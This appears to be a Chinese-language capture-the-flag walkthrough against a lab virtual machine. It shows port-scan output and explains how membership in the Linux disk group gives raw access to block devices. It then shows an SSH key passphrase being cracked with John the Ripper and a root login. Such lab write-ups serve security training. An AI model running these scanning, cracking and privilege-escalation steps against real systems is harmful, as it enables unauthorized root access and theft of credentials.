┌──(root㉿Eecho)-[~] └─# rustscan -a 192.168.43.153 -- -A .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- Scanning ports faster than you can say 'SYN ACK'
[~] The config file is expected to be at "/root/.rustscan.toml" [~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'. Open 192.168.43.153:21 Open 192.168.43.153:22 Open 192.168.43.153:80 Open 192.168.43.153:5000 [~] Starting Script(s) [>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.43.153 Depending on the complexity of the script, results may take some time to appear. [~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-19 17:57 +0800 NSE: Loaded 158 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 17:57 Completed NSE at 17:57, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 17:57 Completed NSE at 17:57, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 17:57 Completed NSE at 17:57, 0.00s elapsed Initiating ARP Ping Scan at 17:57 Scanning 192.168.43.153 [1 port] Completed ARP Ping Scan at 17:57, 0.03s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 17:57 Completed Parallel DNS resolution of 1 host. at 17:57, 0.50s elapsed DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 17:57 Scanning 192.168.43.153 [4 ports] Discovered open port 21/tcp on 192.168.43.153 Discovered open port 80/tcp on 192.168.43.153 Discovered open port 22/tcp on 192.168.43.153 Discovered open port 5000/tcp on 192.168.43.153 Completed SYN Stealth Scan at 17:57, 0.02s elapsed (4 total ports) Initiating Service scan at 17:57 Scanning 4 services on 192.168.43.153 Completed Service scan at 17:57, 9.04s elapsed (4 services on 1 host) Initiating OS detection (try #1) against 192.168.43.153 NSE: Script scanning 192.168.43.153. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 17:57 NSE: [ftp-bounce 192.168.43.153:21] PORT response: 500 Illegal PORT command. Completed NSE at 17:57, 0.76s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 17:57 Completed NSE at 17:57, 0.05s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 17:57 Completed NSE at 17:57, 0.00s elapsed Nmap scan report for 192.168.43.153 Host is up, received arp-response (0.00056s latency). Scanned at 2026-05-19 17:57:36 CST for 11s
PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 64 vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 0 0 34 May 16 2024 supermegaultraimportantebro.txt | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.43.6 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0) | ssh-hostkey: | 256 f4:f1:61:c9:94:fe:27:41:8c:63:56:28:06:a1:12:5f (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLqYL0A7s/EiT1tlSYbcHhL7BYsOGU4UgsB/r0Aa5CZ949xc1i0acamGMX1DyYb6bdwd3x2q1QH9zkVNz2EbxKY= | 256 3c:13:58:8b:6b:5a:16:0b:69:aa:1e:3a:40:57:21:91 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP08fAAhbLYepoD1DMBsKCHA62C4/264QtA9t1Ms69TO 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.59 ((Debian)) |_http-server-header: Apache/2.4.59 (Debian) |_http-title: Knight Bootstrap Template - Index | http-methods: |_ Supported Methods: OPTIONS HEAD GET POST |_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34 5000/tcp open http syn-ack ttl 64 Werkzeug httpd 3.0.3 (Python 3.11.2) |_http-server-header: Werkzeug/3.0.3 Python/3.11.2 | http-methods: |_ Supported Methods: OPTIONS GET HEAD |_http-title: \xC2\xA1Mi P\xC3\xA1gina Web! MAC Address: 08:00:27:2A:69:61 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) TCP/IP fingerprint: OS:SCAN(V=7.99%E=4%D=5/19%OT=21%CT=%CU=42486%PV=Y%DS=1%DC=D%G=N%M=080027%TM OS:=6A0C341B%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=110%TI=Z%CI=Z%II=I% OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5 OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6= OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O% OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0 OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N OS:%T=40%CD=S)
Uptime guess: 49.437 days (since Tue Mar 31 07:28:56 2026) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=258 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE HOP RTT ADDRESS 1 0.56 ms 192.168.43.153
NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 17:57 Completed NSE at 17:57, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 17:57 Completed NSE at 17:57, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 17:57 Completed NSE at 17:57, 0.00s elapsed Read data files from: /usr/share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.95 seconds Raw packets sent: 27 (1.982KB) | Rcvd: 19 (1.454KB)
tcuser@SinPLomo98:~$ id uid=1000(tcuser) gid=1000(tcuser) grupos=1000(tcuser),6(disk),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)
核心漏洞点:当前用户 tcuser 属于 6(disk) 组
漏洞原理分析 (Vulnerability Analysis)
在 Linux 安全模型中,disk 组是一个权限极高的特殊组。该组的用户对系统内的所有块设备(Block Devices,如硬盘、分区等)拥有直接的读写(RW)权限。 常规情况下,普通用户无法访问 /etc/shadow 或 /root 等目录,是因为操作系统在上层文件系统(如 ext4)中施加了权限控制。然而,一旦用户属于 disk 组,就可以绕过上层文件系统的主体访问控制,直接在底层对块设备(硬盘物理轨道数据)进行读取或写入。这意味着攻击者可以物理式地提取敏感数据,或者强行重写系统关键文件。
┌──(root㉿Eecho)-[/tmp/bbbb] └─# vim id_rsa ┌──(root㉿Eecho)-[/tmp/bbbb] └─# chmod 600 id_rsa ┌──(root㉿Eecho)-[/tmp/bbbb] └─# ssh2john id_rsa > rsa_hash.txt ┌──(root㉿Eecho)-[/tmp/bbbb] └─# john --wordlist=/usr/share/wordlists/rockyou.txt rsa_hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes Cost 2 (iteration count) is 16 for all loaded hashes Will run 24 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status angels1 (id_rsa) 1g 0:00:00:10 DONE (2026-05-19 18:17) 0.09107g/s 262.2p/s 262.2c/s 262.2C/s my3kids..soccer9 Use the "--show" option to display all of the cracked passwords reliably Session completed.
切换到root
1 2 3 4 5 6 7 8 9 10 11 12 13 14
tcuser@SinPLomo98:~$ ssh root@127.0.0.1 -i /tmp/id_rsa Enter passphrase for key '/tmp/id_rsa': Linux SinPLomo98 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu May 16 16:49:15 2024 from 192.168.0.108 root@SinPLomo98:~# id uid=0(root) gid=0(root) grupos=0(root) root@SinPLomo98:~#